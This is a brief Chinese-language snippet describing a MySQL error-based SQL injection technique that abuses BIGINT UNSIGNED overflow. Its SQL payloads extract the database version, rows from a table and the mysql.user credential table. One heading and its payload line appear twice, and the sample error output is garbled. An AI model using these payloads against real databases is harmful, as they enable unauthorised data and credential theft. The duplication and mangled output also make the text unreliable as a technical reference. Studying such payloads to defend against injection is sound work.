新型mysql报错注入,这种报错注入主要是基于mysql中无符号int数据类型的溢出:
1.查询数据库版本:
select 2*(if((select 8 from (select (version()))s),18446744073709551610, 18446744073709551610));=select 1E308*if((select * from (select version())x),2,2)或者=select if(x,2,2)*1E308 from(select version()x)y
1.查询数据库版本:
select 2*(if((select 8 from (select (version()))s),18446744073709551610, 18446744073709551610));=select 1E308*if((select * from (select version())x),2,2)或者=select if(x,2,2)*1E308 from(select version()x)y
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if (( Select ' 5.5 from Dual), 18446744073709551610.1844674407370955 1610))' 1610))'
select 2*if((select * from (select * from test.shop)as a limit 1)>(select * from test.shop limit 1),18446744073709551610, 18446744073709551610);=select 1E308*if((select * from(select * from mysql.user) a limit 1)>(select *from mysql.user limit 1),2,2)